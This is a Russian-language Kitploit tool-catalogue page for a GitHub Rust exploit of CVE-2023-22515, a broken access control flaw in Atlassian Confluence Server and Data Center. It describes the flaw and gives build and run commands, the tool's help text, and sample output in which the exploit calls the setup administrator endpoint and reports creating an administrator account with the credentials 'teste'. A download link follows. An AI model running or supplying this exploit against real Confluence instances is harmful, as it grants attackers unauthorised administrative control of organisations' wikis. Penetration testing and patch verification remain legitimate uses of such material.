Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-22515-joaoviictorti — Rust-эксплойт для CVE-2023-22515, который создаёт несанкционированные учётные записи администратора в Confluence Server и Data Center через нарушенный контроль доступа. | Kitploit
Инструменты/GitHubGitHub/killvxk/cve-2023-22515-joaoviictorti
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubkillvxk/cve-2023-22515-joaoviictorti

CVE-2023-22515-joaoviictorti

Rust-эксплойт для CVE-2023-22515, который создаёт несанкционированные учётные записи администратора в Confluence Server и Data Center через нарушенный контроль доступа.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-22515

  • Обзор
  • Компиляция
  • Использование
  • Запуск CVE-2023-22515

Обзор

Confluence — это веб-ориентированная корпоративная вики, разработанная австралийской компанией Atlassian. Компания Atlassian была уведомлена о проблеме, о которой сообщили некоторые клиенты: внешние злоумышленники могли использовать ранее неизвестную уязвимость в публично доступных серверах Confluence и центрах обработки данных для создания несанкционированных учётных записей администратора Confluence и получения доступа к экземплярам Confluence.

Уязвимость классифицирована как CVE-2023-22515

Компиляция

Сначала выполните компиляцию с помощью команды:

root@kitploit:~
cargo build --release

Использование

Это можно сделать двумя способами:

root@kitploit:~
cargo run -- --target http://localhost --username "teste" --password "teste" 
root@kitploit:~
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

Это отобразит справку по инструменту. Вот все параметры, которые он поддерживает:

root@kitploit:~
CVE-2023-22515

Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

Options:
  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

Запуск CVE-2023-22515

root@kitploit:~
cargo run -- --target http://example.com --username "teste" --password "teste" 

[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!
Скачать инструмент